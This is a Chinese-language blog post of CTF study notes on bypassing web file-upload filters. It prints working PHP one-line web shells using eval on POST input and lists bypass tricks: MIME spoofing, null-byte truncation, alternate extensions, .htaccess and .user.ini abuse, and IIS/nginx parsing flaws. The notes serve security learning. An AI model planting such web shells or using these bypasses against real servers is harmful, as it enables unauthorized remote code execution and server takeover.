<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="WEB Upload"><meta name="keywords" content="web,ctf,note,upload"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>WEB Upload | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-7313518215964899',
  enable_page_level_ads: 'true'
});
</script><meta name="google-site-verification" content="UA-186375523"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.3.0'
} </script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#UPLOAD-TIPS"><span class="toc-number">1.</span> <span class="toc-text">UPLOAD TIPS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%89%E7%85%A7%E5%BD%A2%E5%BC%8F%E5%88%86%E7%B1%BB"><span class="toc-number">1.1.</span> <span class="toc-text">按照形式分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%8A%E4%BC%A0shell"><span class="toc-number">1.1.1.</span> <span class="toc-text">上传shell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8C%89%E7%85%A7%E6%80%9D%E8%B7%AF%E5%88%86%E7%B1%BB"><span class="toc-number">1.2.</span> <span class="toc-text">按照思路分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%89%8D%E7%AB%AF%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.1.</span> <span class="toc-text">1 . 前端绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-MIME%E6%A3%80%E6%B5%8B%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.2.</span> <span class="toc-text">2 .MIME检测绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-00%E6%88%AA%E6%96%AD%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.3.</span> <span class="toc-text">3 . 00截断绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%8B%93%E5%B1%95%E5%90%8D%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.4.</span> <span class="toc-text">4.拓展名绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E4%B8%8A%E4%BC%A0%E7%89%B9%E6%AE%8A%E6%96%87%E4%BB%B6%E7%BB%95%E8%BF%87"><span class="toc-number">1.2.5.</span> <span class="toc-text">5.上传特殊文件绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-htaccess%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.5.1.</span> <span class="toc-text">1 .htaccess文件</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-usr-ini%E6%96%87%E4%BB%B6"><span class="toc-number">1.2.5.2.</span> <span class="toc-text">2 .usr.ini文件</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.2.6.</span> <span class="toc-text">6 服务器漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-IIS%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.2.6.1.</span> <span class="toc-text">1 IIS解析漏洞</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-nginx%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.2.6.2.</span> <span class="toc-text">2 nginx解析漏洞</span></a></li></ol></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://s3.ax1x.com/2020/12/21/r0TN5t.png"></div><div class="author-info__name text-center">MOZac Connecter</div><div class="author-info__description text-center">安全人Mozac的平凡日常</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://space.bilibili.com/13299663">关注我</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">朋友们</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vincehut.top/">Vince迷航者</a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">WEB Upload</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-10-03</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="UPLOAD-TIPS"><a href="#UPLOAD-TIPS" class="headerlink" title="UPLOAD TIPS"></a>UPLOAD TIPS</h1><h2 id="按照形式分类"><a href="#按照形式分类" class="headerlink" title="按照形式分类"></a>按照形式分类</h2><h3 id="上传shell"><a href="#上传shell" class="headerlink" title="上传shell"></a>上传shell</h3><p>将php或其他语言的一句话马文件上传到服务器并使用菜刀/蚁剑连接或传参执行命令</p>
<p>一句话马实例：</p>
<pre><code>&lt;?eval(@$_POST[&#39;ls&#39;]); ?&gt;</code></pre>
<p>最简单的一句话马，可以使用菜刀蚁剑等进行连接</p>
<pre><code>&lt;script language=&#39;php&#39;&gt;@eval($_POST[&#39;ye&#39;]);&lt;/script&gt;
&lt;script language=&#39;php&#39;&gt;system(&#39;cat /flag&#39;);&lt;/script&gt;</code></pre>
<p>简单的PHP马，第一句可用菜刀连接，第二句直接读取flag</p>
<h2 id="按照思路分类"><a href="#按照思路分类" class="headerlink" title="按照思路分类"></a>按照思路分类</h2><p>以只允许上传图片为例</p>
<h3 id="1-前端绕过"><a href="#1-前端绕过" class="headerlink" title="1 . 前端绕过"></a>1 . 前端绕过</h3><p>前端只需要上传时后缀为jpg、png等格式，在burpsuite中修改为php、asp等即可。</p>
<h3 id="2-MIME检测绕过"><a href="#2-MIME检测绕过" class="headerlink" title="2 .MIME检测绕过"></a>2 .MIME检测绕过</h3><p>在bp中可以发现 content-type这一项，把后面的值改为 image/gif即可。</p>
<h3 id="3-00截断绕过"><a href="#3-00截断绕过" class="headerlink" title="3 . 00截断绕过"></a>3 . 00截断绕过</h3><p>我们可以上传文件名为 xxx.php.jpg的文件然后在bp中将点号（.）的16进制2e改为00即可</p>
<h3 id="4-拓展名绕过"><a href="#4-拓展名绕过" class="headerlink" title="4.拓展名绕过"></a>4.拓展名绕过</h3><p>1.当不允许上传php我们可以尝试php3、php5、phtml、pht</p>
<p>2.将php改为PHp或其他的可以上传的形式（大小写）</p>
<p>3.当服务器端操作系统为windows时，可以上传 xxx.php.或者xxx.php加<br>上空格，windows会自动去掉点号和空格</p>
<h3 id="5-上传特殊文件绕过"><a href="#5-上传特殊文件绕过" class="headerlink" title="5.上传特殊文件绕过"></a>5.上传特殊文件绕过</h3><h4 id="1-htaccess文件"><a href="#1-htaccess文件" class="headerlink" title="1 .htaccess文件"></a>1 .htaccess文件</h4><p>把SetHandler application/x-httpd-php 这句话写成入.htaccess文件，然后上传个jpg，它就当php解析了，然后我们再上传写入一句话的图片</p>
<h4 id="2-usr-ini文件"><a href="#2-usr-ini文件" class="headerlink" title="2 .usr.ini文件"></a>2 .usr.ini文件</h4><img src="https://img-blog.csdnimg.cn/20200303143603929.png" style="width: 980px;">
auto_prepend_file：指定一个文件，自动包含在要执行的文件前
我们可以先上传1.jpg文件，然后在 .usr.ini中写入 auto_prepend_file=1.jpg并上传即可。

<h3 id="6-服务器漏洞"><a href="#6-服务器漏洞" class="headerlink" title="6 服务器漏洞"></a>6 服务器漏洞</h3><h4 id="1-IIS解析漏洞"><a href="#1-IIS解析漏洞" class="headerlink" title="1 IIS解析漏洞"></a>1 IIS解析漏洞</h4><p>IIS7.0/7.5对任意文件名只要在URL后面加上“/任意文件名.php”就会按照 php的格式去解析 ，例如 :127.0.0.1/1.jpg/shell.php</p>
<h4 id="2-nginx解析漏洞"><a href="#2-nginx解析漏洞" class="headerlink" title="2 nginx解析漏洞"></a>2 nginx解析漏洞</h4><p>同上</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/10/03/Web-Upload-1/">https://mozac-void.yixiangtang.icu/2020/10/03/Web-Upload-1/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/ctf/">ctf</a><a class="post-meta__tags" href="/tags/note/">note</a><a class="post-meta__tags" href="/tags/upload/">upload</a></div><div class="social-share pull-right" data-disabled="facebook"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/10/03/SQL-tips/"><i class="fa fa-chevron-left">  </i><span>SQL tips</span></a></div><div class="next-post pull-right"><a href="/2020/08/07/MOZac-BUUCTF-WP/"><span>BUUCTF-WP</span><i class="fa fa-chevron-right"></i></a></div></nav><div class="post-adv"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=728 height=110 src="//music.163.com/outchain/player?type=0&id=2110349418&auto=1&height=90"></iframe></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjI0My8yODcyMg=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>